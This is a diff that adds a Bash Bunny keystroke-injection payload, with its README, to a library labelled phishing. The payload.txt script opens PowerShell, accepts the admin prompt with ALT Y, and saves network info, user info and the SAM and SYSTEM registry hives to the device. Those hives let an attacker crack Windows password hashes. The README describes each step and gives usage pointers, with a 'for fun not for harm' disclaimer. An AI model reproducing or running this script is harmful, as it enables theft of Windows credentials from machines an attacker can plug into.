get your windows password

payloads/library/phishing/getWINDOWSpassword/README.md

@@ -0,0 +1,18 @@
+AUTHOR: AlexanderWyt
+SIDE NOTE: this is just a prototype and I will make a better one later 
+
+HOW IT WORKS:
+It goes into a keyboard and storage.
+Then it turns red.
+Then it opens powershell via the run command.
+Then it closes powershell and makes it run as admin.
+Then it says yes to run as admin.
+Then it writes down the users. (just in case you dont know what the username is (Ik its irelevant))
+Then it writes down the IPs. (so you know what to connect to)
+Then it writes down the hashes with SAM and SYSTEM.
+DISCLAIMER: this is all wroten down on D:\nothingwashereorwillhappen\ so you need to have a folder with that name on your bash bunny.
+If there is more than one storage unit change it. (I know this is not the most ethical way but I am gonna fix that in the next verison.)
+Then it exits, minimizes all windows, and the bash bunny disconnects and turns green.
+
+ANOTHER SIDE NOTE: if you want to know how you can use this go to: (https://www.youtube.com/watch?v=L26Xq7m0uQ0&list=PLTnKEBOD8VBgfdK-nMiS3-oLM6gz3OHEx&)
+and keep in mind this is for fun not for harm

payloads/library/phishing/getWINDOWSpassword/payload.txt

@@ -0,0 +1,28 @@
+ATTACKMODE HID STORAGE
+LED R
+QUACK GUI r
+QUACK STRING powershell
+QUACK ENTER
+QUACK DELAY 1000
+QUACK STRING "exit Start-Process powershell -Verb RunAs"
+QUACK ENTER
+QUACK DELAY 2200
+QUACK ALT Y
+QUACK DELAY 1000
+QUACK STRING "ipconfig /all | Out-File -FilePath 'D:\nothingwashereorwillhappen\IP.txt'"
+QUACK ENTER
+QUACK DELAY 100
+QUACK STRING "whoamI /all | Out-File -FilePath 'D:\nothingwashereorwillhappen\waitwhoamI.txt'"
+QUACK ENTER
+QUACK DELAY 100
+QUACK STRING "reg save HKLM\sam D:\nothingwashereorwillhappen\whoisSAManyway.save"
+QUACK ENTER
+QUACK DELAY 100
+QUACK STRING "reg save HKLM\system D:\nothingwashereorwillhappen\itsSAMSsystem.save"
+QUACK ENTER
+QUACK DELAY 150
+QUACK STRING "exit"
+QUACK ENTER
+QUACK GUI m
+ATTACKMODE OFF
+LED G